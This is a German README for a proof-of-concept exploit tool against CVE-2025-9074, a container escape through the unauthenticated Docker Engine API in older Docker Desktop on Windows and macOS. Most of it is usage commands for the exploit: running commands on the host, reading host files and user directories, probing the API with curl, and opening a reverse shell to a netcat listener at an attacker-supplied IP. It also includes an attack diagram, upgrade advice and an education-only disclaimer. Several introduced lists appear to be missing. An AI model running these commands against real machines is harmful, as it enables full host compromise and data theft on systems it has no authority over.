
Proof-of-Concept-Exploit für CVE-2025-9074 – Nicht authentifizierter Docker Engine API Container Escape, der Docker Desktop < 4.44.3 unter Windows und macOS betrifft (CVSS 9.3)
Proof-of-Concept-Exploit für CVE-2025-9074 – eine kritische Container-Escape-Sicherheitslücke in Docker Desktop, die unauthentifizierten Zugriff auf die Docker Engine API ermöglicht.
| Eigenschaft | Wert |
|---|---|
| CVE-ID | CVE-2025-9074 |
| CVSS-Score | 9.3 (Kritisch) |
| Betroffene Software | Docker Desktop < 4.44.3 |
| Betroffene Plattformen | Windows, macOS (Linux NICHT betroffen) |
| Behobene Version | Docker Desktop 4.44.3+ |
| Entdecker | Felix Boulet, Philippe Dugré |
| Entdeckungsdatum | Mitte 2025 |
| Patch-Datum | 20. August 2025 |
Die Sicherheitslücke ermöglicht es Containern, die auf Docker Desktop ausgeführt werden, auf die Docker Engine API unter http://192.168.65.7:2375 ohne Authentifizierung zuzugreifen. Dies tritt unabhängig von folgenden Einstellungen auf:
Die Docker Engine API wurde über einen TCP-Socket bereitgestellt, der von Containern aus zugänglich war, was Folgendes ermöglichte:
pip3 install requests
# Einen Befehl auf dem Host ausführen
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"
# Dateien von Windows-Host lesen
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"
# Benutzer unter Windows auflisten
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"
# Terminal 1: Listener einrichten
nc -lvnp 4444
# Terminal 2: Exploit ausführen
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444
# Nach erfolgreicher Verbindung befindet sich das Host-Dateisystem unter: /hostfs
# Wenn Sie bereits Zugriff auf einen Container haben
curl http://192.168.65.7:2375/version
graph TD
A[Bösartiger Container] -->|Keine Authentifizierung erforderlich| B[Docker Engine API<br/>192.168.65.7:2375]
B -->|Container erstellen| C[Privilegierter Container]
C -->|Host-Dateisystem einhängen| D[Vollständiger Host-Zugriff]
D -->|Lesen/Schreiben| E[System kompromittieren]
Aktualisieren Sie sofort auf Docker Desktop 4.44.3 oder höher.
# Überprüfen Sie Ihre Docker Desktop-Version
docker --version
# Docker Desktop aktualisieren
# Windows: Herunterladen von https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Herunterladen von https://desktop.docker.com/mac/main/amd64/Docker.dmg
Falls eine sofortige Aktualisierung nicht möglich ist:
Dieses Tool wird ausschließlich zu Ausbildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.
MIT-Lizenz – Einzelheiten finden Sie in der LICENSE-Datei.